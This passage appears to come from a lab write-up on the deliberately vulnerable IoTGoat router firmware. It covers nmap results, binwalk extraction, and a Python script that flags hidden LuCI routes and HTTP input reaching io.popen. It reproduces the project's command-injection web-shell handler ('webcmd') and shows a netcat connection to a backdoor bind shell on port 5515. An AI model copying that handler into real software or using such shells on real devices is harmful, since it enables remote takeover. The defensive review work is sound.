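                          if p["service"] in ("unknown", "tcpwrapped")),
        "missing": sorted(expected - seen),
        "banners": {p["port"]: p["version"] for p in open_ports if p["version"]},
    }


if __name__ == "__main__":
    for label, text in (("full scan", FULL_SCAN), ("version scan", VERSION_SCAN)):
        print(label, diff_against_baseline(parse_nmap_ports(text)))
```

On the full scan above the report lists 5515 and 65534 under both `unexpected` and `unnamed`: an open port with no recognizable service on a router image is exactly the kind of listener that deserves a look in the extracted file system (which init script starts it, and what binary it runs) before the device ships.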

 

3. Finding hidden pages

1) Extract the IoTGoat file system with binwalk

$ binwalk -eM IoTGoat-raspberry-pi2.img

Scan Time:     2021-01-14 00:54:42
Target File:   /home/kali/Desktop/IoTGoat-raspberry-pi2.img
MD5 Checksum:  9fb28986b3a610fe60f3927bc7dd643b
Signatures:    391

DECIMAL       HEXADECIMAL     DESCRIPTION
-------------------------------------------------------------------------------
4253711       0x40E80F        Copyright string: "copyright does *not* cover user programs that use kernel"
4253946       0x40E8FA        Copyright string: "copyrighted by the Free Software"
4254058       0x40E96A        Copyright string: "copyrighted by me and others who actually wrote it."
4254443       0x40EAEB        Copyright string: "Copyright (C) 1989, 1991 Free Software Foundation, Inc."
4256293       0x40F225        Copyright string: "copyright the software, and"
...
...
29360128      0x1C00000       Squashfs filesystem, little endian, version 4.0, compression:xz, size: 3946402 bytes, 1333 inodes, blocksize: 262144 bytes, created: 2019-01-30 12:21:02

 

2) After extraction, check the iotgoat.lua file in the controller directory of the extracted folder

- Check the admin/iotgoat/cmdinject, admin/iotgoat/cam, admin/iotgoat/door and admin/iotgoat/webcmd entries

- Requesting these paths reveals the hidden pages

~/Desktop/_IoTGoat-raspberry-pi2.img.extracted/squashfs-root/usr/lib/lua/luci/controller
$ ls
admin  firewall.lua  iotgoat  upnp.lua

$ cd iotgoat
$ ls
iotgoat.lua  sensordata.

$ vim iotgoat.lua
module("luci.controller.iotgoat.iotgoat", package.seeall)
local http = require("luci.http")
function index()
    entry({"admin", "iotgoat"}, firstchild(), "IoTGoat", 60).dependent=false
    entry({"admin", "iotgoat", "cmdinject"}, template("iotgoat/cmd"), "", 1)
    entry({"admin", "iotgoat", "cam"}, template("iotgoat/camera"), "Camera", 2)
    entry({"admin", "iotgoat", "door"}, template("iotgoat/door"), "Doorlock", 3)
    entry({"admin", "iotgoat", "webcmd"}, call("webcmd"))
end

function webcmd()
    local cmd = http.formvalue("cmd")
    if cmd then
        local fp = io.popen(tostring(cmd).." 2>&1")
        local result =  fp:read("*a")
        fp:close()
        result = result:gsub("<", "&lt;")
        http.write(tostring(result))
    else
        http.write_json(http.formvalue())
    end
end
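The controller above is the page's own deliberately vulnerable code. As an added example that is not part of IoTGoat or of this post, the following Python script performs that review statically over the extracted file system: it lists the entry() routes, marks those without a menu title (which is what keeps cmdinject and webcmd out of the LuCI navigation), and flags call() handlers in which a value from http.formvalue() reaches io.popen, as webcmd does. The regexes, function names and sink list are my assumptions about LuCI coding conventions; the embedded Lua is copied from the listing above.

```python
"""Static review of a LuCI controller module from an extracted firmware.

Added example, not the project's code. Lists every route registered with
entry({...}, ...), marks routes that LuCI will not render in its menu (empty
or missing title), and flags call() handlers that pass an HTTP parameter into
a command-execution sink such as io.popen.
"""
import re
from pathlib import Path

# Constructed input: the iotgoat.lua listing shown above.
IOTGOAT_LUA = '''\
module("luci.controller.iotgoat.iotgoat", package.seeall)
local http = require("luci.http")
function index()
    entry({"admin", "iotgoat"}, firstchild(), "IoTGoat", 60).dependent=false
    entry({"admin", "iotgoat", "cmdinject"}, template("iotgoat/cmd"), "", 1)
    entry({"admin", "iotgoat", "cam"}, template("iotgoat/camera"), "Camera", 2)
    entry({"admin", "iotgoat", "door"}, template("iotgoat/door"), "Doorlock", 3)
    entry({"admin", "iotgoat", "webcmd"}, call("webcmd"))
end

function webcmd()
    local cmd = http.formvalue("cmd")
    if cmd then
        local fp = io.popen(tostring(cmd).." 2>&1")
        local result =  fp:read("*a")
        fp:close()
        result = result:gsub("<", "&lt;")
        http.write(tostring(result))
    else
        http.write_json(http.formvalue())
    end
end
'''

# entry({"a", "b"}, target(arg), "Title", order) -> path table, target, arg, optional title
ENTRY_RE = re.compile(r'entry\(\s*\{([^}]*)\}\s*,\s*(\w+)\(([^)]*)\)\s*(?:,\s*"([^"]*)")?')
# Lua calls that hand a string to a shell (assumed sink list; extend per code base)
SINK_RE = re.compile(r"\b(io\.popen|os\.execute|luci\.sys\.call|luci\.sys\.exec|sys\.call|sys\.exec)\s*\(")
# local name = http.formvalue(...) marks `name` as attacker-controlled input
TAINT_RE = re.compile(r"local\s+(\w+)\s*=\s*(?:luci\.)?http\.formvalue\(")


def list_routes(lua):
    """Return [(path, target, title)] per entry() call; title is None when omitted."""
    routes = []
    for m in ENTRY_RE.finditer(lua):
        tbl, target, arg, title = m.groups()
        path = "/".join(re.findall(r'"([^"]*)"', tbl))
        routes.append((path, f"{target}({arg.strip()})", title))
    return routes


def function_body(lua, name):
    """Source of `function name(...) ... end`; assumes the closing `end` sits at column 0."""
    m = re.search(r"^function\s+" + re.escape(name) + r"\s*\(.*?^end\b", lua, re.S | re.M)
    return m.group(0) if m else ""


def tainted_sinks(body):
    """Sink calls whose argument line references a variable assigned from an HTTP parameter."""
    tainted = set(TAINT_RE.findall(body))
    hits = []
    for m in SINK_RE.finditer(body):
        arg_line = body[m.end():].split("\n", 1)[0]
        if any(re.search(r"\b" + re.escape(v) + r"\b", arg_line) for v in tainted):
            hits.append(m.group(1))
    return hits


def review_controller(lua):
    """Routes, menu-less routes, and call() handlers that feed HTTP input to a shell."""
    routes = list_routes(lua)
    hidden = [path for path, _, title in routes if not title]
    handlers = {}
    for _, target, _ in routes:
        m = re.match(r'call\("(\w+)"\)', target)
        if m:
            sinks = tainted_sinks(function_body(lua, m.group(1)))
            if sinks:
                handlers[m.group(1)] = sinks
    return {"routes": routes, "hidden": hidden, "tainted_handlers": handlers}


def review_tree(root):
    """Review every controller module under <root>/usr/lib/lua/luci/controller."""
    base = Path(root) / "usr/lib/lua/luci/controller"
    return {str(p.relative_to(base)): review_controller(p.read_text()) for p in base.rglob("*.lua")}


if __name__ == "__main__":
    report = review_controller(IOTGOAT_LUA)
    for path, target, title in report["routes"]:
        flag = "  [no menu title]" if path in report["hidden"] else ""
        print(f"{path:<28} {target}{flag}")
    print("handlers passing HTTP input to a shell:", report["tainted_handlers"])
```

`review_tree('_IoTGoat-raspberry-pi2.img.extracted/squashfs-root')` runs the same check over every controller in the image. A handler that shows up under `tainted_handlers` should not be patched by escaping: the web layer has no business running an arbitrary string through io.popen, so the fix is to drop the shell call or restrict the parameter to a fixed allowlist of commands. The hidden-route list is also worth keeping, because a route with no menu entry is still reachable by URL and is easy to overlook in a UI-driven review.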

 

3) Attempt to obtain a shell via the web shell

- The services with open ports were identified by the nmap scan in 2-1

PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
443/tcp   open  https
5000/tcp  open  upnp
5515/tcp  open  unknown
65534/tcp open  unknown

 

- Obtain a bind shell through port 5515, whose service was reported as unknown

$ nc -nv 192.168.64.133 5515
(UNKNOWN) [192.168.64.133] 5515 (?) open
[***]Successfully Connected to IoTGoat's Backdoor[***]
ls
bin
boot
dev
dnsmasq_setup.sh
etc
lib
mnt
overlay
proc
rom
root
sbin
sys
tmp
usr
var
www

 
